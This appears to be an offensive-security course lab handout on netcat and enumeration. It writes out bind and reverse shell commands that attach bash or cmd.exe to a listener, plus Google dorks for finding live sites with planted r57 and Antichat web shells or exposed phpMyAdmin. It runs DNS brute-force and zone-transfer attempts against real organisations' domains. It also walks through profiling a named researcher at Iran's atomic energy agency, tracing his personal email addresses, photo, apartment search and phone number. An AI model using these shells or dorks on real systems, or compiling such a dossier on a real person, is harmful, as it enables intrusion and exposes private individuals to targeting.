Offensive Security Course Lab
Netcat and Enumeration (Google Hacking, Whois and DNS)
1. NETCAT
a) Help
root@bt:~/lab_bash-script# nc -h
[v1.10-38]
connect to somewhere:   nc [-options] hostname port[s] [ports] ...
listen for inbound:     nc -l -p port [-options] [hostname] [port]
options:
        -c shell commands       as `-e'; use /bin/sh to exec [dangerous!!]
        -e filename             program to exec after connect [dangerous!!]
        -b                      allow broadcasts
        -g gateway              source-routing hop point[s], up to 8
        -G num                  source-routing pointer: 4, 8, 12, ...
        -h                      this cruft
        -i secs                 delay interval for lines sent, ports scanned
        -k                      set keepalive option on socket
        -l                      listen mode, for inbound connects
        -n                      numeric-only IP addresses, no DNS
        -o file                 hex dump of traffic
        -p port                 local port number
        -r                      randomize local and remote ports
        -q secs                 quit after EOF on stdin and delay of secs
        -s addr                 local source address
        -T tos                  set Type Of Service
        -t                      answer TELNET negotiation
        -u                      UDP mode
        -v                      verbose [use twice to be more verbose]
        -w secs                 timeout for connects and final net reads
        -z                      zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. 'ftp-data').
root@bt:~/lab_bash-script#
Solution Consultoria e Treinamento
www.solution-rj.com.br
Rua Monan Pequeno 38/38, Pendotiba, Niterói, RJ.
Email: solution@solution-rj.com.br/Tel: 021 8732-9993
1
b) Banner grabbing
Checking open ports and reading banners
root@bt:~/lab_bash-script# nc -nv 172.16.49.100 21
(UNKNOWN) [172.16.49.100] 21 (ftp) open
220 (vsFTPd 2.3.0)
root@bt:~/lab_bash-script# nc -nv 172.16.49.100 80
(UNKNOWN) [172.16.49.100] 80 (www) open
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Wed, 20 Jun 2012 22:01:42 GMT
Server: Apache/2.2.16 (Ubuntu)
Last-Modified: Wed, 20 Jun 2012 21:57:24 GMT
ETag: "c5af2-b1-4c2ee7bee7e05"
Accept-Ranges: bytes
Content-Length: 177
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
c) Simple chat
On BackTrack
nc -lvp 4444
On Windows XP-SP2
nc -nv 172.16.49.130 4444
Just type anything on either machine.
d) Remote Administration
- BIND SHELL
On the BT box located on the external network
root@bt:~# nc -lvp 4444 -e /bin/bash
listening on [any] 4444 ...
On the Windows XP-SP2 machine on the internal network
C:\>nc -nv 172.16.49.130 4444
(UNKNOWN) [172.16.49.130] 4444 (?) open
ls
Desktop
lab_bash-script
rota.sh
- REVERSE SHELL - NC
On the BT box located on the external network
root@bt:~# nc -lvp 4444
listening on [any] 4444 ...
On the Windows XP-SP2 machine on the internal network
C:\>nc -nv 172.16.49.130 4444 -e cmd.exe
(UNKNOWN) [172.16.49.130] 4444 (?) open
Result on BT
root@bt:~# nc -lvp 4444
listening on [any] 4444 ...
172.16.50.10: inverse host lookup failed: Unknown server error : Connection timed out
connect to [172.16.49.130] from (UNKNOWN) [172.16.50.10] 1214
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\>hostname
hostname
CTP028
C:\>
e) Port Scan
External BT scanning the firewall (ports 21 to 30)
root@bt:~# nc -z -nvv -w 1 172.16.49.100 21-30
(UNKNOWN) [172.16.49.100] 30 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 29 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 28 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 27 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 26 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 25 (smtp) : Connection refused
(UNKNOWN) [172.16.49.100] 24 (?) : Connection refused
(UNKNOWN) [172.16.49.100] 23 (telnet) : Connection refused
(UNKNOWN) [172.16.49.100] 22 (ssh) open
(UNKNOWN) [172.16.49.100] 21 (ftp) open
f) File Transfer
External BT listening and writing whatever it receives to output.txt
root@bt:~# nc -lvp 4444 > output.txt
listening on [any] 4444 ...
172.16.50.10: inverse host lookup failed: Unknown server error : Connection timed out
connect to [172.16.49.130] from (UNKNOWN) [172.16.50.10] 1224
On Windows XP-SP2 on the internal network
C:\>nc.exe -nv 172.16.49.130 4444 < arq1.txt
(UNKNOWN) [172.16.49.130] 4444 (?) open
Result
root@bt:~# ls
Desktop lab_bash-script output.txt rota.sh
root@bt:~# more output.txt
teste de transferencia
root@bt:~#
2. Google Search
Google search operators - check the site operator and the others
site:offensive-security.com - see how many web pages the domain has (indexed pages)
Videoconferencing software
intext:"Videoconference Management System" ext:htm
Open phpMyAdmin
intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"
Norton AV for gateways
inurl:"8003/Display?what="
MSN contacts
filetype:ctt "msn"
Kickstart
#kickstart filetype:cfg
#kickstart filetype:cfg site:gov.br
CAREFUL!!!!!!
Apache backdoor
intitle:r57 shell filetype:php
Site with a planted backdoor - antichat in the title
intitle:"Antichat Shell" "disable functions"
3. Google Search Social
aeoi.org.ir by itself in Google - look at the emails
Use theharvester.py (Python script on BT)
root@bt:~# cd /pentest/enumeration/theharvester/
root@bt:/pentest/enumeration/theharvester# ./theHarvester.py -d aeoi.org.ir -l 500 -b google
[-] Searching in Google:
Searching 0 results...
Searching 100 results...
Searching 200 results...
[+] Emails found:
-----------------
hkazemian@aeoi.org.ir
Use hkazemian@aeoi.org.ir
He is a researcher and has a Yahoo email
Use hkazemian@yahoo.com
See SPAG Zeolite
Company address, contact phone and another Gmail address
- look for a photo
Use hosseinkazemian@gmail.com - looking for an apartment, see the phone number
Whois query
root@bt:~# whois checkpoint.com | more
Whois Server Version 2.0
Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.
Server Name: CHECKPOINT.COM
IP Address: 216.200.241.66
Registrar: NETWORK SOLUTIONS, LLC.
Whois Server: whois.networksolutions.com
Referral URL: http://www.networksolutions.com/en_US/
Domain Name: CHECKPOINT.COM
Registrar: NETWORK SOLUTIONS, LLC.
Whois Server: whois.networksolutions.com
Referral URL: http://www.networksolutions.com/en_US/
Name Server: NS2.CHECKPOINT.COM
Name Server: NS6.CHECKPOINT.COM
Name Server: NS8.CHECKPOINT.COM
Name Server: NS9.CHECKPOINT.COM
Status: clientTransferProhibited
Updated Date: 30-may-2012
Creation Date: 29-mar-1994
Expiration Date: 30-mar-2018
Administrative Contact, Technical Contact:
Admin, DNS
hostmaster@CHECKPOINT.COM
Check Point Software Technologies Ltd.
3A Jabotinsky St.
Ramat-Gan, 52520
IL
+972-3-7534555 fax: +972-3-5759256
Record expires on 30-Mar-2018.
Record created on 29-Mar-1994.
Database last updated on 20-Jun-2012 22:30:44 EDT.
Domain servers in listed order:
NS2.CHECKPOINT.COM
NS6.CHECKPOINT.COM
NS8.CHECKPOINT.COM
NS9.CHECKPOINT.COM
206.184.151.195
194.29.32.199
216.228.148.29
194.29.38.64
Reverse whois query
root@bt:~# whois 216.200.241.66
#
# Query terms are ambiguous. The query is assumed to be:
# "n 216.200.241.66"
#
# Use "?" to get help.
#
#
# The following results may also be obtained via:
#
# http://whois.arin.net/rest/nets;q=216.200.241.66?showDetails=true&showARIN=false&ext=netref2
#
CHECKPOINT SOFTWARE MFN-B655-216-200-241-64-28 (NET-216-200-241-64-1)
216.200.241.64 - 216.200.241.79
Abovenet Communications, Inc ABOVENET-5 (NET-216-200-0-0-1) 216.200.0.0 - 216.200.255.255
#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
5. DNS
Manual queries
root@bt:~# nslookup www.checkpoint.com
Server:         172.16.49.2
Address:        172.16.49.2#53
Non-authoritative answer:
Name: www.checkpoint.com
Address: 216.200.241.66
Querying the domain's mail servers and name servers
root@bt:~# nslookup
> set type=mx
> checkpoint.com
Server:         172.16.49.2
Address:        172.16.49.2#53
Non-authoritative answer:
checkpoint.com mail exchanger = 12 sami.checkpoint.com.
checkpoint.com mail exchanger = 15 usmail-as.zonelabs.com.
Authoritative answers can be found from:
> set type=ns
> checkpoint.com
Server:         172.16.49.2
Address:        172.16.49.2#53
Non-authoritative answer:
checkpoint.com nameserver = ns2.checkpoint.com.
checkpoint.com nameserver = ns6.checkpoint.com.
checkpoint.com nameserver = ns8.checkpoint.com.
checkpoint.com nameserver = ns9.checkpoint.com.
checkpoint.com nameserver = ns1.checkpoint.com.
Authoritative answers can be found from:
>
- DNS Information Gathering
1- forward lookup BF (brute force) - try to guess valid names
root@bt:~/lab_DNS# host www.checkpoint.com
www.checkpoint.com has address 216.200.241.66
www.checkpoint.com has IPv6 address 2620:0:2a01:2::1a10
root@bt:~/lab_DNS# host wwwwwwww.checkpoint.com
Host wwwwwwww.checkpoint.com not found: 3(NXDOMAIN)
root@bt:~/lab_DNS#
- use script1.sh on BT for forward lookup BF (no output filtering)
root@bt:~/lab_DNS# more script_dns1.sh
#!/bin/bash
# Forward lookup brute force: try every word in the list as a host name under checkpoint.com
WORDLIST=/pentest/enumeration/dns/dnsenum/dns.txt
while read -r name; do
    [ -n "$name" ] || continue          # skip blank lines in the wordlist
    host "$name.checkpoint.com"
done < "$WORDLIST"
- use script2.sh on BT for forward lookup BF (only the "has address" lines)
root@bt:~/lab_DNS# more script_dns2.sh
#!/bin/bash
# Same brute force, keeping only the lines for names that actually resolve to an IPv4 address
WORDLIST=/pentest/enumeration/dns/dnsenum/dns.txt
while read -r name; do
    [ -n "$name" ] || continue
    host "$name.checkpoint.com" | grep "has address"
done < "$WORDLIST"
root@bt:~/lab_DNS# ./script_dns2.sh
forums.checkpoint.com has address 194.29.38.13
ftp.checkpoint.com has address 194.29.38.25
ftps.checkpoint.com has address 194.29.38.27
mailhost.checkpoint.com has address 194.29.32.199
cale.checkpoint.com has address 194.29.32.199
mx1.checkpoint.com has address 194.29.38.66
ns.checkpoint.com has address 194.29.32.199
ns1.checkpoint.com has address 208.185.174.140
ns2.checkpoint.com has address 208.185.174.141
register.checkpoint.com has address 194.29.38.35
search.us.checkpoint.com has address 209.87.209.207
smtp.checkpoint.com has address 194.29.34.68
www.checkpoint.com has address 216.200.241.66
www.checkpoint.com has address 216.200.241.66
root@bt:~/lab_DNS#
- use script3.sh on BT for forward lookup BF (IPs only)
root@bt:~/lab_DNS# more script_dns3.sh
#!/bin/bash
# Same brute force, printing only the fourth field ("<name> has address <ip>") of each hit
WORDLIST=/pentest/enumeration/dns/dnsenum/dns.txt
while read -r name; do
    [ -n "$name" ] || continue
    host "$name.checkpoint.com" | grep "has address" | cut -d" " -f4
done < "$WORDLIST"
root@bt:~/lab_DNS# ./script_dns3.sh
194.29.38.13
194.29.38.25
194.29.38.27
194.29.32.199
194.29.32.199
194.29.38.66
194.29.32.199
208.185.174.140
208.185.174.141
194.29.38.35
209.87.209.207
194.29.34.68
216.200.241.66
216.200.241.66
2- reverse lookup BF
- Try reverse resolution
root@bt:~/lab_DNS# host 216.200.241.66
66.241.200.216.in-addr.arpa domain name pointer www.checkpoint.com.
root@bt:~/lab_DNS# for ip in $(seq 64 79); do host 216.200.241.$ip | grep "domain name pointer" ;done
64.241.200.216.in-addr.arpa domain name pointer 216.200.241.64.available.above.net.
65.241.200.216.in-addr.arpa domain name pointer lata-gw.us.checkpoint.com.
66.241.200.216.in-addr.arpa domain name pointer www.checkpoint.com.
67.241.200.216.in-addr.arpa domain name pointer garmin.us.checkpoint.com.
68.241.200.216.in-addr.arpa domain name pointer flanger.us.checkpoint.com.
69.241.200.216.in-addr.arpa domain name pointer gould.us.checkpoint.com.
70.241.200.216.in-addr.arpa domain name pointer franklin.us.checkpoint.com.
71.241.200.216.in-addr.arpa domain name pointer darwin.us.checkpoint.com.
72.241.200.216.in-addr.arpa domain name pointer artemis.us.checkpoint.com.
73.241.200.216.in-addr.arpa domain name pointer amadeus.us.checkpoint.com.
74.241.200.216.in-addr.arpa domain name pointer streamer.us.checkpoint.com.
75.241.200.216.in-addr.arpa domain name pointer lata1.us.checkpoint.com.
76.241.200.216.in-addr.arpa domain name pointer lata2.us.checkpoint.com.
77.241.200.216.in-addr.arpa domain name pointer davis1.us.checkpoint.com.
78.241.200.216.in-addr.arpa domain name pointer davis2.us.checkpoint.com.
79.241.200.216.in-addr.arpa domain name pointer 216.200.241.79.available.above.net.
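As an added example (not part of the original lab), a small Python parser for the host(1) output formats shown above, forward and reverse, that builds an inventory, records NXDOMAIN answers and flags PTRs that are only the provider's placeholder; a defender can run it over lookups against their own zone to see which names and PTRs are exposed. The sample lines are copied from the output above; treating names under available.above.net as unassigned addresses is an assumption based on that output.

```python
import ipaddress
import re
from dataclasses import dataclass, field

# The three line shapes host(1) printed on this page.
FORWARD_RE = re.compile(r"^(\S+) has (IPv6 )?address (\S+)$")
PTR_RE = re.compile(r"^(\S+)\.in-addr\.arpa domain name pointer (\S+)\.$")
NXDOMAIN_RE = re.compile(r"^Host (\S+) not found: 3\(NXDOMAIN\)$")

@dataclass
class HostInventory:
    forward: dict = field(default_factory=dict)   # name -> sorted list of addresses
    reverse: dict = field(default_factory=dict)   # ip -> PTR name
    missing: list = field(default_factory=list)   # names answered with NXDOMAIN
    unparsed: list = field(default_factory=list)  # lines this parser did not recognise

def ptr_to_ip(arpa_prefix: str) -> str:
    """'66.241.200.216' (reversed octets from in-addr.arpa) -> '216.200.241.66'."""
    return ".".join(reversed(arpa_prefix.split(".")))

def parse_host_output(text: str) -> HostInventory:
    inv = HostInventory()
    names = {}  # name -> set of addresses (duplicates in the wordlist collapse here)
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if m := FORWARD_RE.match(line):
            names.setdefault(m.group(1), set()).add(m.group(3))
        elif m := PTR_RE.match(line):
            inv.reverse[ptr_to_ip(m.group(1))] = m.group(2)
        elif m := NXDOMAIN_RE.match(line):
            inv.missing.append(m.group(1))
        else:
            inv.unparsed.append(line)
    inv.forward = {name: sorted(addrs) for name, addrs in names.items()}
    return inv

def placeholder_ptrs(inv: HostInventory, suffix: str = ".available.above.net") -> list:
    """IPs whose PTR is the provider's placeholder (assumption: address not assigned)."""
    return sorted((ip for ip, name in inv.reverse.items() if name.endswith(suffix)),
                  key=ipaddress.ip_address)

# Sample lines copied from the host(1) output on this page.
SAMPLE = """\
www.checkpoint.com has address 216.200.241.66
www.checkpoint.com has IPv6 address 2620:0:2a01:2::1a10
www.checkpoint.com has address 216.200.241.66
Host wwwwwwww.checkpoint.com not found: 3(NXDOMAIN)
66.241.200.216.in-addr.arpa domain name pointer www.checkpoint.com.
64.241.200.216.in-addr.arpa domain name pointer 216.200.241.64.available.above.net.
"""
```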
3- Zone transfer
root@bt:~# host -t ns offensive-security.com
offensive-security.com name server ns4.no-ip.com.
offensive-security.com name server ns2.no-ip.com.
offensive-security.com name server ns1.no-ip.com.
offensive-security.com name server ns3.no-ip.com.
offensive-security.com name server ns5.no-ip.com.
root@bt:~# host -l offensive-security.com ns1.no-ip.com
; Transfer failed.
Using domain server:
Name: ns1.no-ip.com
Address: 204.16.255.55#53
Aliases:
Host offensive-security.com.localdomain not found: 9(NOTAUTH)
; Transfer failed.
------try with all the name servers (primary and secondaries)
------do the same for aeoi.org.ir and estacio.br
Use /pentest/enumeration/dnsenum
root@bt:/pentest/enumeration/dns/dnsenum# ls
dns-big.txt dnsenum.pl dns.txt README.txt
root@bt:/pentest/enumeration/dns/dnsenum# ./dnsenum.pl estacio.br
estacio.br                       5        IN    A        200.216.152.71

Name Servers:
ns1.estacio.br                   5        IN    A        200.216.152.249
ns2.estacio.br                   5        IN    A        200.216.152.250

Mail (MX) Servers:
Mail.Global.FrontBridge.com      5        IN    A        216.32.180.22
Mail.Global.FrontBridge.com      5        IN    A        216.32.181.178

estacio.br                       1800     IN    TXT
estacio.br                       1800     IN    A        200.216.152.71
1989163337.estacio.br            1800     IN    CNAME
mail._domainkey.estacio.br       14400    IN    TXT
agenda.estacio.br                1800     IN    A        200.216.152.71
agendaconselho.estacio.br        1800     IN    A        200.216.152.71
aluno.estacio.br                 1800     IN    MX
biblioteca.estacio.br            1800     IN    CNAME
bibliotecasonora.estacio.br      1800     IN    A        200.216.152.90
blogdopresidente.estacio.br      1800     IN    A        200.216.152.149
bquestoes.estacio.br             1800     IN    A        200.216.152.63
adm.bquestoes.estacio.br         1800     IN    A        200.216.152.62
provas.bquestoes.estacio.br      1800     IN    A        200.216.152.63